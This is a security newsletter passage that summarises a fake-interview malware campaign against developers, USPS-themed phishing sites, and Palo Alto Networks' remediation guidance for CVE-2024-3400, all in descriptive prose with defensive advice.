To print this article, all you need is to be registered or login on Mondaq.com.
Ransomware/Malware Activity
Job-Seeking Software Developers Deceived into
Downloading a Python Backdoor
Researchers are following a social engineering-based malware
campaign designed to deceive job-seeking software developers into
downloading a malicious python backdoor as part of a fake interview
process. The campaign is called “DEV#POPPER” and
researchers have speculated that North Korea may be behind its
operation. The attackers are known to make initial contact with
prospective employees by posing as hiring managers looking to fill
a developer role. As part of the interview process, candidates are
asked to download a coding task from a GitHub repository,
purportedly as a test of technical aptitude. The zip file hosted on
GitHub and downloaded by the victim contains an NPM (node package
manager) package along with a README.md file. When the NPM package
is run, an obfuscated JavaScript file runs a curl command that
downloads an archive file which itself is an obfuscated python
script. The obfuscated python script is a remote access tool (RAT)
with mechanisms for persistence, command execution, FTP data
exfiltration, and keystrokes logging. This campaign is being waged
on the heels of a similar campaign dubbed “Contagious
Interview” during which attackers similarly posed as employers
to coerce job-seeking developers into installing BeaverTail and
InvisibleFerret malware. Both campaigns seem to target software
developers specifically. DEV#POPPER has been linked to North Korea
due to the social engineering technique of targeting job-seekers,
which the Lazarus Group has been notorious for using in its
campaigns. CTIX analysts caution those currently looking for new
jobs to do proper due diligence on prospective companies prior to
entering the interview process. CTIX analysts will continue to
report on new and emerging malware and associated campaigns.
Threat Actor Activity
Phishing Campaigns Targeting USPS Have Alarming Success
Rates
A recent discovery has found an alarming rate of traffic to
domains associated with phishing campaigns targeting the United
States Postal Service (USPS), revealing that traffic to fraudulent
domains often rivals or surpasses that of the legitimate USPS
website, most notably during the holiday season. Initiated by an
investigation into suspicious SMS messages, researchers uncovered a
significant number of “combosquatting” domains designed
to mimic the official USPS site, deceiving users into downloading
malware, sharing sensitive information, or mostly making payments
to fraudulent entities for what’s often advertised as a
“redelivery” fee. The findings from October 2023 to
February 2024 indicate a sophisticated and wide-reaching effort by
cybercriminals to exploit the USPS brand, with malicious traffic
peaking during the November to December holiday season. This
underscores the broader risk of combosquatting campaigns that
potentially target multiple brands beyond USPS. The fake sites used
in these campaigns leveraged convincing replicas of USPS’s
website and package tracking system, with one of the malicious
domains having attracted nearly half a million queries, and
multiple others surpassing 150,000. CTIX analysts encourage
consumers to exercise caution and skepticism towards unsolicited
communications about package shipments. To avoid falling victim to
these phishing attempts, it’s recommended to directly access
the official USPS website for any parcel tracking needs rather than
clicking on links provided in messages, thereby safeguarding
personal and financial information from cybercriminal activities.
The USPS also has a page on their website related to these phishing
campaigns for how to report potential fraud and prevent being
scammed. A link can be found below.
Vulnerabilities
Palo Alto Networks Issues Tiered Remediation Techniques
for Mitigating a Recently Patched Critical
Vulnerability
Palo Alto Networks has issued remediation guidance for a
critical security vulnerability in PAN-OS, which has been actively
exploited since at least March 26, 2024. The flaw, tracked as
CVE-2024-3400 (CVSS score of 10/10), allows for unauthenticated
remote shell command execution on affected devices and has been
patched in various versions of PAN-OS. Named Operation
MidnightEclipse, the exploitation involves deploying a Python-based
backdoor, UPSTYLE, which executes commands from specially crafted
requests. Although no specific threat actor has been linked, the
sophistication suggests a state-backed group. Palo Alto Networks
outlines remediation steps for various levels of compromise. At
Level 0, an unsuccessful attempt prompts a hotfix update. Level 1,
where vulnerability testing is evident without harmful commands,
also requires a hotfix update. For Level 2, where potential data
exfiltration such as unauthorized copying of configuration files is
detected, a hotfix update and a Private Data Reset are necessary.
At Level 3, which shows interactive malicious activities, both a
hotfix update and a Factory Reset are advised. CTIX analysts urge
any administrators to ensure they have followed the guidance in the
advisory linked below to prevent future exploitation.
The content of this article is intended to provide a general
guide to the subject matter. Specialist advice should be sought
about your specific circumstances.
POPULAR ARTICLES ON: Technology from United States
#Ankura #CTIX #FLASH #Update #April #Security
